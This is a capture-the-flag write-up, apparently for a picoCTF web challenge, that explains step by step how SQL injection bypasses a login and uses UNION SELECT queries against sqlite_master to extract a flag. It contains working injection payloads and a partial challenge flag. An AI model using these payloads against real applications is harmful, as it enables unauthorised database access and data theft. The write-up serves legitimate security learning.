Challenge Overview
Can you find the flag on this website.
Try to find the flag here.
Solution
Just starting out I put "admin" for user, and "admin" for password.
This is the SQL Query:
SELECT id FROM users WHERE password = 'admin' AND username = 'admin'
It shows the password first so that is where you want to put the SQL Injection. Also you can notice it is single qoutes and not double qoutes so that will also be use in createing a SQL Injection Query.
Also note there are common comment charaters for SQL injection, two of the most common ones are "#" and "--".
Injection payload: ' OR 1=1 --
SELECT id FROM users WHERE password = ' ' OR 1=1 -- ' AND username = 'does not matter'
You can see the first single qoute closes the password string and the OR 1=1 is always true. Additionall the comment "--" makes the rest of the code irrelevant.
Now you see a database with another place input which probably means more SQL Injection needed.
This query showed that there are three different columns that need to be worked with.
' UNION SELECT null,null,null;--
Before Query:
After Query:
This query assumes the use of SQLite as sqlite_master is an internal table in all SQLite databases.
' UNION SELECT sql,null,null FROM sqlite_master;--
From this output it can be seen that the flag is in more_table so I changed one of the attributes to be flag and got it from more_table which resulted in the flag.
' UNION SELECT null,null,flag FROM more_table;--
You can put it in any orientation you want, for instance this query also works:
' UNION SELECT flag,null,null FROM more_table;--
Flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0...}